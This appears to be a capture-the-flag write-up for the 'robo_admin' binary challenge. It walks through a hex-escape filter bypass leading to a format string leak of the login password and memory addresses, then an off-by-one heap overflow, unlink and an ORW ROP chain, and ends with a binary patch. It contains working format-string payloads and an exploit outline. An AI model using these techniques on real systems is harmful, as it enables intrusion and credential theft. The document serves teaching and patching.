This article analyzes the core logic, root causes, and exploitation chain of the robo_admin challenge. It explains how escape-sequence decoding bypasses input filtering, then triggers a format string bug to leak the password and memory addresses, and finally combines that leak with an off-by-one to achieve heap exploitation and ORW. The article also outlines a practical patching strategy. Keywords: Pwn, Format String, Unlink.
Technical Specification Snapshot
| Parameter | Value |
|---|---|
| Challenge Type | Binary Pwn / Heap Exploitation |
| Primary Language | C |
| Runtime Environment | Linux x86_64 |
| Key Vulnerabilities | Format String, Off-by-One |
| Protections | PIE, Stack Canary, sandbox restrictions on execve/open |
| Exploitation Goals | Leak password, enter admin menu, hijack heap state, achieve ORW |
| Core Dependencies | glibc, tcache/unsorted bin, IDA, GDB |
| Image Source | Screenshots from the original write-up |
The core challenge comes from the mismatch between input filtering and the actual execution path
At first glance, the program blocks % and $, which makes format string exploitation appear impossible. The real issue, however, is that the program validates the raw input first and only then decodes \xNN sequences. That allows an attacker to reconstruct dangerous characters after validation.
This means the filter runs first, but the risk appears later. Once you understand the setnote -> decode -> show data flow, the full bug chain becomes clear: first bypass the filter, then reach printf(s__1, ...).
AI Visual Insight: This image shows the main menu entry point in the decompiled control flow. It is useful for identifying the function dispatcher, initialization order, and user-reachable attack surface, which is the first step in building an overall exploitability model.
init clears heap state, which sets up the conditions for later heap exploitation
The initialization function iterates through list, frees any existing chunks, and clears the size array, state flags, and note area. This behavior is not a vulnerability by itself, but it affects heap layout and makes later heap operations after login more likely to enter the expected bin chains.
void *init() {
for (int i = 0; i <= 7; ++i) {
if (list[i]) {
free(list[i]); // Free historical heap chunks and reset heap state
list[i] = 0;
}
sizeee[i] = 0; // Clear recorded sizes
}
memset(&s_, 0, 0xC0);
memset(useflag, 0, 8);
memset(s__1, 0, 0x100);
noteflag = 0;
dword_52C4 = 0;
return 0;
}
This logic rebuilds a heap environment that is clean but still predictable.
The decode function is the real entry point that makes the format string bug exploitable
setnote rejects % and $ in the raw input, but then calls decode. Since decode supports hex escapes such as \x25 and \x24, an attacker can pass the initial check and restore % and $ in the decoded output.
This is a classic semantic mismatch: the program validates the pre-decoded data but executes the post-decoded data.
AI Visual Insight: This image shows the note-setting and input-handling logic. The key detail is the separation between the filter condition and the later decode call, which demonstrates that the defense only covers superficial characters and not the actual decoded payload.
long decode(char *src, char *dst, size_t limit) {
size_t j = 0;
for (size_t i = 0; src[i]; ++i) {
if (src[i] == '\\' && src[i + 1] == 'x') {
int hi = hex_to_int(src[i + 2]); // Parse the high 4 bits
int lo = hex_to_int(src[i + 3]); // Parse the low 4 bits
dst[j++] = (hi << 4) | lo; // Restore the original byte
i += 3;
} else {
dst[j++] = src[i]; // Write ordinary characters directly
}
}
dst[j] = 0;
return 0;
}
This code restores hex-escaped input into raw bytes, which directly enables the format string bypass.
The printf call in show treats user input as a format string
When noteflag is set, the show function executes printf(s__1, ...) on the first display. Here, s__1 is the decoded note content, so an attacker can build a format string such as %6$p.%7$p... to leak addresses.
More importantly, the program places the random values p_rand and rand in argument positions that can be read by the format string. In other words, it effectively places the material used to build the login password directly on the stack.
printf("Notice: ");
if (noteflag) {
if (dword_52C4) {
printf("%s", s__1);
} else {
dword_52C4 = 1;
printf(s__1, n16, v2, v3, v4, v5,
p_rand, rand, stack0, stack1); // User-controlled format string
}
}
This code triggers the format string vulnerability during the first display and exposes critical stack arguments.
The login mechanism depends on a random password that can be leaked
login requires the username ROBOADMIN, and the password must be a 32-character hex string formed by concatenating %016lx%016lx. Since show can already leak those two random values, login is not a real barrier. It is simply the second hop in the exploit chain.
Once the attacker enters the admin menu, the challenge shifts from information disclosure to heap exploitation.
payload = b'\\x256\\x24p.\\x257\\x24p.\\x2515\\x24p.'
# Reconstruct % and $ through \x25 and \x24 to build the format string
This payload bypasses the initial filter and generates an executable format string after decoding.
The off-by-one in edit is the core primitive that unlocks the heap attack phase
After login, edit contains an obvious boundary bug: the maximum writable length is size + 1. That means an attacker can overflow by one byte into the metadata of the next heap chunk, creating a classic off-by-one.
With tcache already shaped in advance, this single-byte overwrite is enough to influence the adjacent chunk’s size field and then build the conditions for unlink or unsorted bin exploitation.
size_t n = get_length(sizeee[idx] + 1); // Critical bug: allows size+1
ssize_t r = read(0, list[idx], n);
if (sizeee[idx] <= r) {
list[idx][sizeee[idx] - 1] = 0; // Only fixes the tail byte and cannot stop overflow
}
This logic provides a one-byte out-of-bounds write primitive that can finely modify a neighboring chunk header.
The attack path can be summarized as leak, login, corrupt heap, write stack, and achieve ORW
In the original write-up, the exploit chain first uses the format string to recover the password, PIE base, and libc base, then enters the backend menu to shape the heap. Because the initialization stage has already freed multiple chunks, the attacker can combine that with a full tcache state so that later frees fall into the unsorted bin.
Next, the off-by-one changes the size of a neighboring chunk. Combined with unlink, this allows the attacker to forge list pointers in .bss, eventually pivot toward environ, leak a stack address, and then write a ROP chain onto the stack to achieve ORW. Because the sandbox disables open, using openat is the more reliable choice.
A minimal exploitation outline looks like this
from pwn import *
# 1. Build an escaped format string to leak the random password and addresses
fmt = b'\\x256\\x24p.\\x257\\x24p.\\x2515\\x24p.\\x2523\\x24p.'
# 2. Log in to the backend
# 3. Allocate multiple 0xd8 chunks to prepare the heap layout
# 4. Use the off-by-one to modify the neighboring chunk size
# 5. Free to trigger unlink and overwrite the environ pointer
# 6. Leak the stack address and then write the openat/read/write ROP chain
This pseudocode summarizes the full attack chain rather than providing fully reproducible exploit details.
The correct patch should block dangerous characters after decoding instead of only changing printf
Replacing printf with puts can mitigate the format string issue, but the challenge requires a specific patching behavior. A more complete fix is to insert custom validation during the decoded write-back stage: as soon as the decoded result becomes % or $, print an error string and refuse to continue writing it.
The original article uses .eh_frame as an injection area because that section typically does not affect the main logic and is suitable for a short patch stub. However, you must first change the section permissions so that it becomes executable.
AI Visual Insight: This image shows the process of locating .eh_frame-related section information in IDA. The focus is on finding a low-interference injection area for patch code and examining section properties and the path for permission changes.
AI Visual Insight: This image shows the exact position and attributes of .eh_frame in the ELF section table view. Before patching, you need to confirm the target section index, size, and flags field to avoid breaking the load layout.
AI Visual Insight: This image shows the result after changing the section flags to executable. The key technical point is turning a data-oriented section into an executable area that can hold a trampoline or custom validation logic.
; Replace the original location with call check
call check
nop
nop
check:
cmp dl, 24h ; Check whether the byte is '$'
jz bad_input
cmp dl, 25h ; Check whether the byte is '%'
jz bad_input
mov [rax], dl ; Write the decoded byte back normally
add qword ptr [rbp-8], 3
jmp resume
bad_input:
lea rdi, [rip+msg] ; Print the invalid input warning
call puts
jmp resume
This patch enforces validation at the decoded-byte level, which closes the root cause of the bypass.
The most important takeaways from this challenge are two secure design lessons
First, any input validation must stay aligned with the final semantics of the data. If you validate pre-decoded text but execute dangerous APIs on the decoded result, the filter is effectively meaningless.
Second, a one-byte overflow remains highly dangerous in heap challenges. As long as it can influence a chunk size, prev_inuse, or linked-list pointers, an off-by-one is enough to reach high-value exploitation primitives.
AI Visual Insight: This image shows the program’s behavior after patching. It confirms that the program now emits a blocking message when it detects dangerous decoded characters, demonstrating that the fix has moved from superficial function replacement to semantic-level input defense.
FAQ
Q1: Why does a format string vulnerability still exist if % and $ were filtered originally?
Because the filter runs before decoding. An attacker can submit \x25 and \x24, and decode will restore them to % and $. The result then flows into printf(s__1, ...), so the vulnerability still exists.
Q2: Why can the login password be recovered?
When show calls printf, it passes p_rand and rand in positions that the format string can access. The attacker reads them through the format string and then concatenates them using the %016lx%016lx rule to obtain a valid password.
Q3: Why should the patch prioritize checking characters after decoding?
Because that is the root-cause fix. Changing only printf removes the current format string sink, but it does not prove that every future sink is safe. Blocking dangerous characters uniformly at the decoded-output layer directly cuts off the bypass path and provides a stronger defense.
Core Summary: This article reconstructs the robo_admin binary challenge and focuses on two core vulnerabilities: a format string bug and an off-by-one. It explains the full attack chain from decode-based bypass and login credential leakage to heap exploitation and ORW, and then shows how to patch the binary in IDA by injecting validation logic into .eh_frame. Keywords: Pwn, Format String, Unlink.